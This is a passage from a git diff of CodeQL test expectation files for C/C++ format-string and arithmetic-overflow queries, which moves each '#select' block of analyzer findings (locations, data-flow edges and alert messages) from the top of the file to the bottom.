format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:126:9:126:30 | *call to nonConstFuncToArray | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:126:2:126:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:130:9:130:10 | *v9 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:130:9:130:10 | *v9 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:130:2:130:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:85:7:85:8 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:135:9:135:11 | *v10 | consts.cpp:90:12:90:13 | gets output argument | consts.cpp:135:9:135:11 | *v10 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:135:2:135:7 | call to printf | printf | +| consts.cpp:140:9:140:11 | *v11 | consts.cpp:139:13:139:16 | readString output argument | consts.cpp:140:9:140:11 | *v11 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:140:2:140:7 | call to printf | printf | +| consts.cpp:145:9:145:11 | *v12 | consts.cpp:144:16:144:18 | readStringRef output argument | consts.cpp:145:9:145:11 | *v12 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | consts.cpp:145:2:145:7 | call to printf | printf | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected index 3966ccbf52fd..4447b215aedf 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/funcs/funcsLocal.expected @@ -1,12 +1,3 @@ -#select -| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | -| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | -| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | -| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | -| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | -| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | -| funcsLocal.c:53:9:53:11 | ** ... | funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | -| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | edges | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | provenance | | | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:57:2:57:14 | ... = ... | provenance | | @@ -41,3 +32,12 @@ nodes | funcsLocal.c:57:2:57:14 | ... = ... | semmle.label | ... = ... | | funcsLocal.c:58:9:58:10 | *e1 | semmle.label | *e1 | subpaths +#select +| funcsLocal.c:17:9:17:10 | *i1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:17:9:17:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | +| funcsLocal.c:27:9:27:10 | *i3 | funcsLocal.c:26:8:26:9 | fgets output argument | funcsLocal.c:27:9:27:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:26:8:26:9 | fgets output argument | string read by fgets | +| funcsLocal.c:32:9:32:10 | *i4 | funcsLocal.c:31:13:31:17 | *call to fgets | funcsLocal.c:32:9:32:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:31:13:31:17 | *call to fgets | string read by fgets | +| funcsLocal.c:37:9:37:10 | *i5 | funcsLocal.c:36:7:36:8 | gets output argument | funcsLocal.c:37:9:37:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:36:7:36:8 | gets output argument | string read by gets | +| funcsLocal.c:42:9:42:10 | *i6 | funcsLocal.c:41:13:41:16 | *call to gets | funcsLocal.c:42:9:42:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:41:13:41:16 | *call to gets | string read by gets | +| funcsLocal.c:47:9:47:11 | ** ... | funcsLocal.c:46:7:46:9 | gets output argument | funcsLocal.c:47:9:47:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:46:7:46:9 | gets output argument | string read by gets | +| funcsLocal.c:53:9:53:11 | ** ... | funcsLocal.c:52:8:52:11 | *call to gets | funcsLocal.c:53:9:53:11 | ** ... | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:52:8:52:11 | *call to gets | string read by gets | +| funcsLocal.c:58:9:58:10 | *e1 | funcsLocal.c:16:8:16:9 | fread output argument | funcsLocal.c:58:9:58:10 | *e1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | funcsLocal.c:16:8:16:9 | fread output argument | string read by fread | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected index 8f06acca17f1..7408d8360ef5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/globalVars/UncontrolledFormatString.expected @@ -1,9 +1,3 @@ -#select -| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | -| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | edges | globalVars.c:8:7:8:10 | **copy | globalVars.c:8:7:8:10 | **copy | provenance | | | globalVars.c:8:7:8:10 | **copy | globalVars.c:27:9:27:12 | *copy | provenance | | @@ -61,3 +55,9 @@ subpaths | globalVars.c:30:15:30:18 | *copy | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:30:15:30:18 | printWrapper output argument | | globalVars.c:35:11:35:14 | *copy | globalVars.c:15:21:15:23 | *val | globalVars.c:15:21:15:23 | *val | globalVars.c:35:11:35:14 | setCopy2 output argument | | globalVars.c:41:15:41:19 | *copy2 | globalVars.c:19:25:19:27 | *str | globalVars.c:19:25:19:27 | *str | globalVars.c:41:15:41:19 | printWrapper output argument | +#select +| globalVars.c:27:9:27:12 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:27:9:27:12 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:30:15:30:18 | *copy | globalVars.c:23:27:23:30 | **argv | globalVars.c:30:15:30:18 | *copy | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:38:9:38:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:38:9:38:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:41:15:41:19 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:41:15:41:19 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printWrapper(str), which calls printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | +| globalVars.c:50:9:50:13 | *copy2 | globalVars.c:23:27:23:30 | **argv | globalVars.c:50:9:50:13 | *copy2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | globalVars.c:23:27:23:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected index 5dad063c999f..e8d852cbcd27 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-134/semmle/ifs/ifs.expected @@ -1,15 +1,3 @@ -#select -| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | -| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | edges | ifs.c:16:27:16:30 | **argv | ifs.c:61:3:61:14 | *... = ... | provenance | | | ifs.c:16:27:16:30 | **argv | ifs.c:68:3:68:14 | *... = ... | provenance | | @@ -58,3 +46,15 @@ nodes | ifs.c:123:3:123:14 | *... = ... | semmle.label | *... = ... | | ifs.c:124:9:124:10 | *i9 | semmle.label | *i9 | subpaths +#select +| ifs.c:62:9:62:10 | *c7 | ifs.c:16:27:16:30 | **argv | ifs.c:62:9:62:10 | *c7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:69:9:69:10 | *c8 | ifs.c:16:27:16:30 | **argv | ifs.c:69:9:69:10 | *c8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:75:9:75:10 | *i1 | ifs.c:16:27:16:30 | **argv | ifs.c:75:9:75:10 | *i1 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:81:9:81:10 | *i2 | ifs.c:16:27:16:30 | **argv | ifs.c:81:9:81:10 | *i2 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:87:9:87:10 | *i3 | ifs.c:16:27:16:30 | **argv | ifs.c:87:9:87:10 | *i3 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:93:9:93:10 | *i4 | ifs.c:16:27:16:30 | **argv | ifs.c:93:9:93:10 | *i4 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:99:9:99:10 | *i5 | ifs.c:16:27:16:30 | **argv | ifs.c:99:9:99:10 | *i5 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:106:9:106:10 | *i6 | ifs.c:16:27:16:30 | **argv | ifs.c:106:9:106:10 | *i6 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:112:9:112:10 | *i7 | ifs.c:16:27:16:30 | **argv | ifs.c:112:9:112:10 | *i7 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:118:9:118:10 | *i8 | ifs.c:16:27:16:30 | **argv | ifs.c:118:9:118:10 | *i8 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | +| ifs.c:124:9:124:10 | *i9 | ifs.c:16:27:16:30 | **argv | ifs.c:124:9:124:10 | *i9 | The value of this argument may come from $@ and is being used as a formatting argument to printf(format). | ifs.c:16:27:16:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected index b1a17aac3623..a2221ec2fd3f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticTainted.expected @@ -1,8 +1,8 @@ -#select -| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf | edges | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | provenance | | nodes | examples.cpp:63:26:63:30 | fscanf output argument | semmle.label | fscanf output argument | | examples.cpp:66:11:66:14 | data | semmle.label | data | subpaths +#select +| examples.cpp:66:11:66:14 | data | examples.cpp:63:26:63:30 | fscanf output argument | examples.cpp:66:11:66:14 | data | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | examples.cpp:63:26:63:30 | fscanf output argument | value read by fscanf | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected index 24e8043d7dbf..dbc1a99858e9 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.expected @@ -1,16 +1,3 @@ -#select -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | edges | examples.cpp:22:5:22:33 | ... = ... | examples.cpp:25:31:25:34 | data | provenance | | | examples.cpp:22:26:22:33 | call to rand | examples.cpp:22:5:22:33 | ... = ... | provenance | | @@ -44,3 +31,16 @@ nodes | examples.cpp:35:26:35:33 | call to rand | semmle.label | call to rand | | examples.cpp:38:9:38:12 | data | semmle.label | data | subpaths +#select +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | +| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected index c07119831d7e..97bd3603cd3c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected @@ -1,31 +1,3 @@ -#select -| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | -| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | -| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | -| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:125:13:125:16 | call to rand | uncontrolled value | -| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:131:13:131:16 | call to rand | uncontrolled value | -| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | -| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | -| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | -| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | -| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | -| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | -| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:86:10:86:13 | call to rand | uncontrolled value | -| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:98:10:98:13 | call to rand | uncontrolled value | -| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | -| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | -| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | -| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:205:7:205:7 | y | 